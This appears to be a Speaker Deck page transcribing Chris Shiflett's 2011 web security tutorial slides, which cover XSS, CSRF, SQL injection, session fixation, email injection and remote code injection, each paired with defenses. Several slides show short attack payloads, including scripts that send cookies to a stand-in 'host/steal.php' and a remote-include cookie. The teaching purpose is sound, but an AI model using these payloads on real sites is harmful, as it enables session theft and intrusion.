Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Evolution of Web Security

Chris Shiflett
September 26, 2011
Programming
10
1.3k

Evolution of Web Security

This is a multi-faceted tutorial that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I demonstrate how traditional exploits are being combined together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.

Chris Shiflett

September 26, 2011
Tweet

More Decks by Chris Shiflett

See All by Chris Shiflett
Understanding People
shiflett
2
2.4k

Other Decks in Programming

See All in Programming
3 Effective Rules for Using Signals in Angular
manfredsteyer
PRO
1
100
GitHub Actionsのキャッシュと手を挙げることの大切さとそれに必要なこと
satoshi256kbyte
5
430
型付き API リクエストを実現するいくつかの手法とその選択 / Typed API Request
euxn23
8
2.2k
Jakarta EE meets AI
ivargrimstad
0
200
みんなでプロポーザルを書いてみた
yuriko1211
0
260
どうして僕の作ったクラスが手続き型と言われなきゃいけないんですか
akikogoto
1
120
macOS でできる リアルタイム動画像処理
biacco42
9
2.4k
Amazon Bedrock Agentsを用いてアプリ開発してみた!
har1101
0
340
AWS Lambdaから始まった
Serverlessの「熱」とキャリアパス / It started with AWS Lambda Serverless “fever” and career path
seike460
PRO
1
260
CSC509 Lecture 11
javiergs
PRO
0
180
2024/11/8 関西Kaggler会 2024 #3 / Kaggle Kernel で Gemma 2 × vLLM を動かす。
kohecchi
5
930
『ドメイン駆動設計をはじめよう』のモデリングアプローチ
masuda220
PRO
8
540

Featured

See All Featured
ReactJS: Keep Simple. Everything can be a component!
pedronauck
665
120k
Facilitating Awesome Meetings
lara
50
6.1k
Rebuilding a faster, lazier Slack
samanthasiow
79
8.7k
Understanding Cognitive Biases in Performance Measurement
bluesmoon
26
1.4k
Faster Mobile Websites
deanohume
305
30k
Gamification - CAS2011
davidbonilla
80
5k
Learning to Love Humans: Emotional Interface Design
aarron
273
40k
A Philosophy of Restraint
colly
203
16k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
42
9.2k
A Modern Web Designer's Workflow
chriscoyier
693
190k
Building Adaptive Systems
keathley
38
2.3k
The Straight Up "How To Draw Better" Workshop
denniskardys
232
140k

Transcript

  1. Evolution of Web Security Chris Shiflett @shiflett ▪ shiflett.org

  2. Who am I? Web craftsman from Brooklyn, NY, and founding

    member of Analog, a web design & development co-operative.

  3. 1. Fundamentals

  4. Defense in depth — Redundant safeguards are valuable. Least privilege

    — Grant as little freedom as possible. Least complicated — Complexity breeds mistakes. Three Principles

  5. Filter input. — Ensure data coming in is valid. Escape

    output. — Ensure data going out is not misinterpreted. Two Practices

  6. Application Escape Filter Filter input. Escape output.

  7. <?php $clean = array(); if (ctype_alpha($_POST['name'])) { $clean['name'] = $_POST['name'];

    } else { /* Error */ } ?>

  8. <?php $clean = array(); switch ($_POST['color']) { case 'red': case

    'green': case 'blue': $clean['color'] = $_POST['color']; break; default: /* Error */ break; } ?>

  9. <?php $clean = array(); $colors = array('red', 'green', 'blue'); if

    (in_array($_POST['color'], $colors)) { $clean['color'] = $_POST['color']; } else { /* Error */ } ?>

  10. <?php $clean = array(); $colors = array(); $colors['red'] = '';

    $colors['green'] = ''; $colors['blue'] = ''; if (isset($colors[$_POST['color']])) { $clean['color'] = $_POST['color']; } else { /* Error */ } ?>

  11. <?php $clean = array(); if (preg_match('/^\d{5}$/', $_POST['zip'])) { $clean['zip'] =

    $_POST['zip']; } else { /* Error */ } ?>

  12. <?php /* Content-Type: text/html; charset=UTF-8' */ $html = array(); $html['user']

    = htmlentities($clean['user'], ENT_QUOTES, 'UTF-8'); echo "<p>Welcome, {$html['user']}.</p>"; ?>
  13. None

  14. Cross-Site Scripting Cross-Site Request Forgeries SQL Injection Session Fixation Session

    Hijacking Email Injection Remote Code Injection Exploits

  15. Victim Attacker Cross-Site Scripting Target XSS HTML XSS 1 2

  16. echo $_GET['user']; http://host/foo.php?user=%3Cscript%3E… echo '<script>…';

  17. <script> document.location = 'http://host/steal.php?cookies=' + encodeURI(document.cookie); </script> Steal Cookies

  18. <script> document.forms[0].action = 'http://host/steal.php'; </script> Steal Passwords

  19. <form name="steal" action="http://host/steal.php"> <input type="text" name="username" style="display: none" /> <input

    type="password" name="password" style="display: none" /> <input type="image" src="image.png" /> </form> Steal Saved Passwords

  20. <script src="http://host/evil.js"></script> Short & Simple

  21. $string = "<script>alert('XSS');</script>"; $string = mb_convert_encoding($string, 'UTF-7'); echo htmlentities($string); Character

    Encoding Google XSS Example http://shiflett.org/blog/2005/dec/google-xss-example

  22. FIEO. Use valid HTML. — http://validator.w3.org/ Use existing solutions. —

    PHP developers, use htmlentities() or htmlspecialchars(). — Make sure you indicate the character encoding! Need to allow HTML? — Use HTML Purifier, even if you’re not using PHP: http://htmlpurifier.org/ Stop It!

  23. Target Attacker Cross-Site Request Forgeries Victim ? CSRF 1 2

  24. Because the attack is carried out by the victim, CSRF

    can bypass: — HTTP auth — Session-based auth — Firewalls — &c. CSRF

  25. Buy <form action="buy.php" method="post"> <input type="hidden" name="isbn" value="059600656X" /> <input

    type="submit" value="Buy" /> </form> POST /buy.php HTTP/1.1 Host: host Cookie: PHPSESSID=1234 Content-Type: application/x-www-form-urlencoded Content-Length: 15 isbn=059600656X

  26. Forging GET GET /buy.php?isbn=059600656X HTTP/1.1 Host: host Cookie: PHPSESSID=1234 <img

    src="http://host/buy.php?isbn=059600656X" />

  27. <iframe style="visibility: hidden" name="secret"></iframe> <form name="buy" action="http://host/buy.php" method="post" target="secret"> <input

    type="hidden" name="isbn" value="059600656X" /> </form> <script type="text/javascript">document.buy.submit();</script> Forging POST POST /buy.php HTTP/1.1 Host: host Cookie: PHPSESSID=1234 Content-Type: application/x-www-form-urlencoded Content-Length: 15 isbn=059600656X

  28. Digg (Fixed) http://4diggers.blogspot.com/ Amazon (Fixed?) http://shiflett.org/amazon.php CSRF Exploits

  29. <script> new Image().src = 'http://host/steal.php?cookies=' + encodeURI(document.cookie); </script> Steal Cookies

    (Improved)

  30. $token = md5(uniqid(rand(), TRUE)); $_SESSION['token'] = $token; $html['token'] = htmlentities($token,

    ENT_QUOTES, 'UTF-8'); Stop It! <input type="hidden" name="token" value="<?php echo $html['token']; ?>" />

  31. Database Attacker SQL Injection Target SQL SQL SQL 1 2

  32. SELECT count(*) FROM users WHERE username = '{$_POST['username']}' AND password

    = '…' chris' /* SELECT count(*) FROM users WHERE username = 'chris' /*' AND password = '…'

  33. FIEO. Use prepared statements. — PHP developers, use PDO. Stop

    It! addslashes() Versus mysql_real_escape_string() http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

  34. http://host/login.php?PHPSESSID=1234 Session Fixation

  35. Regenerate the session identifier. — PHP developers, session_regenerate_id(TRUE). Do this

    whenever the privilege level changes. Stop It!

  36. Attacker impersonates a victim. In PHP, by default, only requires

    a valid session identifier. Session identifier obtained using: — Prediction — Capture — Fixation Session Hijacking

  37. Understand how sessions work. Minimize session identifier exposure. — SSL

    — Separate domain for embedded resources Trending — https://panopticlick.eff.org/ — More on this later… Stop It!

  38. [email protected]\r\nBcc: [email protected]\r\nBcc: … To: [email protected] Subject: Feedback From: [email protected] Bcc:

    [email protected] Bcc: … Email Injection mail('[email protected]', 'Feedback', '...', "From: {$_POST['email']}");

  39. FIEO. — http://iamcal.com/publish/articles/php/parsing_email — PHP developers, use ctype_print() as defense

    in depth. Stop It!

  40. Target Attacker Remote Code Injection

  41. include "{$_COOKIE['type']}.php"; Cookie: type=http://host/inject.inc? include "http://host/inject.inc?.php";

  42. This example exploits allow_url_fopen. PHP 5 has allow_url_include. — By

    default, allow_url_include is disabled. Remote Code Injection

  43. include "php://input"; POST /script.php?type=php://input%00 HTTP/1.1 Host: host Content-Type: application/x-www-form-urlencoded Content-Length:

    ? ? include "{$_GET['type']}.php";

  44. FIEO. — If at all possible, use a white list.

    Stop It!

  45. 2. Emerging Trends

  46. Ajax “The name is shorthand for Asynchronous JavaScript + XML,

    and it represents a fundamental shift in what’s possible on the Web.” — Jesse James Garrett

  47. Ajax “Client-side techniques & technologies that allow two-way communication between

    the client and the server without reloading the page.”

  48. Target Victim JS 1. XMLHttpRequest 2. HTML form + victim’s

    token 3. XMLHttpRequest + victim’s token Cross-Domain Ajax

  49. Target Victim XSS + Ajax + CSRF XSS 1. XMLHttpRequest

    2. HTML form + victim’s token 3. XMLHttpRequest + victim’s token

  50. XSS is a perfect platform for CSRF. CSRF attacks can

    exploit XSS vulnerabilities. Victims can become attackers. Rinse. Repeat. Worms

  51. Browser Hijacking http://shiflett.org/blog/2006/oct/using-csrf-for-browser-hijacking Myspace CSRF and XSS Worm (Samy) http://shiflett.org/blog/2005/oct/myspace-csrf-and-xss-worm-samy

  52. <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> Cross-Domain Ajax Thanks, Flash!

  53. Cross-Domain Ajax domain="*" API domain Vulnerable? No yahoo.com No No

    youtube.com No Yes api.flickr.com No Yes No adobe.com Yes No

  54. Target Attacker JavaScript Hijacking Victim ? CSRF 1 2 3

    4

  55. <script src="http://host/json.php"></script> [{"email": "[email protected]"}] JavaScript Hijacking Demo http://mochikit.com/fortify_fud/

  56. JavaScript Hijacking “If you audit your application for CSRF flaws,

    you’ve defeated this attack. Moreover, the well-known, pre-existing exploits for CSRF are actually worse than this attack.” — Thomas Ptacek

  57. 3. Ideas for the Future

  58. Panopticlick https://panopticlick.eff.org/ Trending “When you visit a web site, you

    are allowing that site to access a lot of information about your computer’s configuration. Combined, this information can create a kind of fingerprint — a signature that could be used to identify you and your computer.”

  59. Trending “Not the intent, but Panopticlick from @eff would be

    useful for preventing session hijacking.” — http://twitter.com/shiflett/status/8562663352

  60. Establish trends to help detect anomalies. Trends can be based

    on identity or behavior. Trending is imperfect; use as defense in depth. Trending

  61. Slides http://shiflett.org/evolution-of-web-security.pdf http://slideshare.net/shiflett

  62. Follow me on Twitter. — @shiflett Comment on my blog.

    — shiflett.org Email me. — chris@shiflett.org Work with me. — analog.coop Feedback?